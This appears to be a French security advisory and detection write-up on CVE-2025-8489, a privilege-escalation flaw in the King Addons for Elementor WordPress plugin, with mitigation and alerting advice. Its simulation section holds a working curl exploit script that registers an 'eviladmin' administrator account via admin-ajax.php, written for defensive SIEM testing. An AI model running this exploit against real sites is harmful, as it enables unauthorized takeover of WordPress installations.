Vulnérabilité Critique de King Addons pour Elementor en Cours d’Exploitation

Résumé

Une faille critique d’escalade de privilèges sans authentification (CVE-2025-8489) dans le plugin King Addons pour WordPress Elementor permet aux attaquants d’enregistrer de nouveaux utilisateurs avec des privilèges administrateur. La faille est exploitée activement depuis le 31 octobre 2025, Wordfence bloquant des dizaines de milliers de tentatives. Les attaquants exploitent le problème via des requêtes POST forgées envoyées au point de terminaison admin-ajax.php. Les versions 24.12.92 à 51.1.14 sont impactées, avec un correctif disponible dans la version 51.1.35.

Enquête

La télémétrie de Wordfence a enregistré plus de 48 400 tentatives d’exploitation, avec un pic notable les 9-10 novembre 2025. La source IPv6 la plus active était 2602:fa59:3:424::1. Les charges utiles malveillantes utilisent des données POST HTTP qui définissent le paramètre user_role sur administrateur pendant le flux de travail d’enregistrement. Aucun déploiement de malware supplémentaire n’a été observé au-delà de la création de comptes administrateur frauduleux.

Atténuation

Mettez à jour King Addons pour Elementor vers la version 51.1.35 ou une version plus récente. Activez les protections de pare-feu Wordfence déployées le 4 août 2025 (premium) et le 3 septembre 2025 (gratuit). Vérifiez les listes d’utilisateurs WordPress pour les comptes administrateur inattendus et examinez continuellement les journaux à la recherche du schéma de POST suspect.

Réponse

Déclenchez des alertes sur le trafic POST vers /wp-admin/admin-ajax.php qui inclut user_role=administrateur. Bloquez les adresses IP abusives, en prêtant une attention particulière à la source IPv6 mise en évidence. Effectuez des vérifications d’hygiène des comptes et supprimez tout utilisateur administrateur non autorisé. Déployez des signatures IDS basées sur l’hôte adaptées à la structure de la requête observée.

Exécution de Simulation

Prérequis : Le contrôle préalable à la télémétrie et à la ligne de base doit être réussi.

• Narratif de l’attaque et commandes :
  Un adversaire découvre CVE‑2025‑8489 dans le plugin King Addons pour Elementor. Il configure une requête POST vers admin-ajax.php qui inclut le paramètre action=king_addons_user_register (requis par le plugin) and force le rôle du nouvel utilisateur à administrateur via user_role=administrator. En envoyant cette requête directement au point de terminaison vulnérable, l’attaquant obtient un compte WordPress privilégié sans nécessiter d’authentification préalable. La charge utile est encodée en URL pour simuler un client web réaliste.

• Script de test de régression :

  #!/usr/bin/env bash
  # Script d'exploitation pour l'escalade de privilèges King Addons pour Elementor (CVE‑2025‑8489)
  
  TARGET="http://webserver.example.com"
  ENDPOINT="/wp-admin/admin-ajax.php"
  
  # Données POST forgées (encodées en URL)
  POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator"
  
  echo "[*] Envoi de la charge utile d'exploitation..."
  curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/x-www-form-urlencoded" 
       --data "${POST_DATA}"
  
  echo -e "n[+] Exploit envoyé. Vérifiez le SIEM pour l'alerte générée."

• Commandes de nettoyage :

  # Supprimer l'utilisateur malveillant créé lors du test
  curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" 
    -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')"
  echo "[*] Nettoyage terminé."